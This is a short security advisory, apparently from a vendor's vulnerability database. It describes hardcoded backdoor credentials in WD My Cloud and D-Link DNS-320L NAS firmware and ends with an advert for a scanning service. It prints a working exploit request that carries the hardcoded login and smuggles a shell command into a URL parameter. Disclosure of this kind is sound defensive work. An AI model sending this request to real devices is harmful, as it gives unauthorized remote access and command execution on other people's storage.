Hardcoded credentials were detected in firmware shared by D-Link DNS-320 L and WD My Cloud. The issue was brought up by researchers from GulfTech in the beginning of January 2018, while the vendor has patched the vulnerability in November 2017.
Given the age of code that contained the backdoor we tend to believe that this issue has being exploited in the wild. Therefore we track this vulnerability as a zero-day.
Vulnerable component: WD My Cloud
CVSSv3 score: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C
CWE-ID: CWE-912 - Hidden Functionality (Backdoor)
The vulnerability allows a remote attacker to gain unauthorized access to vulnerable device.
The vulnerability exists due to presence of a backdoor code (hard-coded account credentials) in firmware shared by WD My Cloud and D-LINK DNS-320L ShareCenter software. A remote attacker can send a specially crafted HTTP GET request to the affected device and gain unauthorized access to it.
GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&start=1&count=1;touch+/tmp/gulftech; HTTP/1.1
Vulnerability scanning SaaS service is online 3-rd generation vulnerability scanner with scheduled assessments and vulnerability subscription. You can use service to check security of your network perimeter.